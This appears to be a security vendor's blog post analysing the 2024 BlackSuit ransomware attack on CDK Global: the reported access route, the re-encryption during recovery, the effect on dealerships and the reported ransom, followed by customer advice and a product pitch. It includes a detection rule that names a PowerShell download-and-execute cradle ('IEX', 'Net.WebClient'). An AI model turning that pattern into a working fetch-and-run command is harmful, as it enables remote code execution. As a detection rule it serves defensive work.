Late on the night of Tuesday, June 18, 2024, CDK Global — the dominant Dealer Management System (DMS) provider for roughly 15,000 North American auto retailers — detected ransomware activity inside its hosted DMS environment. By 2:00 a.m. Eastern on June 19, CDK had taken both of its data centres offline. Hours after restoration efforts began, a second attack struck. For the next 12 days, dealerships from Holman in New Jersey to Lithia in Oregon ran on paper invoices, hand-written deal jackets, and improvised spreadsheets. Anderson Economic Group estimated the cumulative dealer-side loss at $1.02 billion. Two weeks later, blockchain analytics firms traced a $25 million Bitcoin payment from a CDK-attributed wallet to an address controlled by BlackSuit, a ransomware operation tracked as a successor to Royal and a descendant of the Conti family.
Who is BlackSuit?
BlackSuit emerged in May 2023 as a partial rebrand of the Royal ransomware crew, itself a Conti splinter. CISA Joint Advisory AA23-339A (December 2023) confirmed the lineage and noted BlackSuit's preferred initial-access patterns: callback-phishing, BEC-then-VPN, and SonicWall/Citrix edge-device exploitation. By the time of the CDK incident, BlackSuit had over 95 confirmed victim listings on its dark-web leak site, including Octapharma Plasma (April 2024) and the city of Dallas (May 2023, as Royal). Mandiant tracks the cluster as UNC2596, and ReliaQuest's GreyMatter telemetry placed BlackSuit's median dwell time at 8.7 days during Q2 2024.
How did they get into CDK?
CDK has not publicly described the initial access vector. Two independent reports — one from cybersecurity firm Optiv on June 25, 2024 and one from CRN on July 3 citing two CDK customers — describe the entry as compromise of a third-party support tool used by CDK's hosting operations team, followed by stolen administrator credentials reused across CDK's VMware vSphere clusters. The second-wave attack on June 19 happened because CDK had begun restoring from offline backups into the same cluster before fully evicting the actor; BlackSuit's foothold survived and they re-encrypted the partial restore. This is a pattern Sophos's Incident Response Report 2024 explicitly warned about: 31% of ransomware engagements in 2023-2024 included re-encryption during recovery.
What broke for dealerships?
CDK's DMS handles vehicle inventory, financing F&I, parts ordering, service-bay scheduling, payroll, and DMV title-and-registration filings. When it went dark, dealers could not run credit applications, could not pull manufacturer rebates, could not file out-of-state titles, and could not order parts from OEM hubs that integrate via CDK's API. Several large groups (Lithia, Asbury, AutoNation) said in 8-K filings that the outage cost them between $400 and $1,500 per vehicle in lost gross profit, with Asbury alone reporting a $20-30 million revenue hit. Manufacturers including Stellantis, Ford, and Honda issued emergency extensions on warranty-claim submission deadlines. The Massachusetts RMV stopped accepting CDK-generated digital title applications, forcing buyers to wait weeks for plates.
Did CDK pay?
Multiple credible reports (Bloomberg June 21, CNN June 22, CyberScoop June 24) say CDK negotiated and ultimately paid approximately $25 million in Bitcoin. Blockchain forensics firm TRM Labs publicly tracked a 387 BTC transfer on June 21 that aligned with the reported sum. CDK has never confirmed or denied. The payment likely covered a decryptor and a non-publication agreement; BlackSuit removed CDK from its leak site, which is the usual signal of a settled negotiation. The reported demand had escalated from $10 million on June 21 to "over $50 million" by June 22 before the deal closed.
How long was the restoration?
Service began returning to small dealer groups on June 22. By June 27, CDK had restored core DMS modules for the majority of customers, but full functionality — including the DealerSocket CRM and Roadster digital-retail front end — did not return until July 4. Dealers reported lingering data-integrity issues into August (parts-inventory counts drifted; F&I credit-decision histories returned incomplete). CDK ultimately offered customers a one-time service credit and accelerated migration to a redesigned cloud architecture that segments tenants more strictly.
Why does this incident matter for supply chain security?
CDK is a single point of failure for an entire industry vertical. Roughly half of the franchised new-car dealerships in North America run on CDK; the rest are split between Reynolds & Reynolds, Dealertrack, Tekion, and Auto/Mate. When CDK fell, 0.5% of U.S. GDP for two weeks ran on paper. That is the same dynamic that made Change Healthcare so damaging in February 2024 (one clearinghouse for a third of U.S. medical claims), and that makes Blue Yonder, Veeva, Snowflake, and Salesforce systemically important to their verticals. Industry-vertical SaaS has become critical infrastructure, but is largely outside the scope of FFIEC, NERC CIP, or sector-specific cybersecurity rules.
# Detection: BlackSuit re-encryption pattern (post-restore beacon resurfacing)
title: Suspected BlackSuit Re-Encryption Beacon After Recovery Activity
id: blacksuit-cdk-reenc-2024
detection:
selection_recovery:
EventID: 4624
AccountName|contains: 'restore'
LogonType: 3
selection_beacon:
Image|endswith: '\powershell.exe'
CommandLine|contains|all:
- 'IEX'
- 'Net.WebClient'
- '/api/jquery-3.3.1'
condition: selection_recovery and selection_beacon within 6h
level: critical
What should industry-vertical SaaS customers do?
Five steps. First, demand contractual cyber resilience commitments — RTO, RPO, immutable-backup attestation, third-party SOC 2 Type II with ransomware testing, customer-facing incident notification within four hours. Second, build a manual-operations runbook that a non-IT employee can execute for at least seven business days. Third, hold a third-party "DMS dark" tabletop annually; CDK ran one in 2022 and it shaped their recovery sequence. Fourth, diversify where possible — multi-DMS strategies are emerging in the largest groups, with Auto/Mate or Tekion as a hot-standby. Fifth, request an SBOM and incident-response posture review from your SaaS provider, including their third-party-support-tool inventory; the CDK intrusion came through one of those.
How Safeguard Helps
Safeguard maps every SaaS supplier touching a dealer group's financial, customer, and OT systems and continuously evaluates each one against the CISA Secure by Design pledge, NIST SP 800-161r1 supply-chain criteria, and observed incident history. Griffin AI's incident-correlation engine watches BlackSuit, RansomHub, Akira, and Qilin leak sites and OSINT feeds in near-real-time, raising a critical finding the moment a tier-1 vendor like CDK Global appears, with reachability analysis showing which of your business processes break if that vendor goes dark. TPRM scoring tracks each SaaS provider's RTO/RPO commitments, immutable-backup posture, and time-to-disclose, downgrading vendors who fall short. Policy gates block any new SaaS integration that lacks contractual incident-notification language tighter than the industry median, ensuring the next CDK-class outage finds your organisation rehearsed rather than improvising.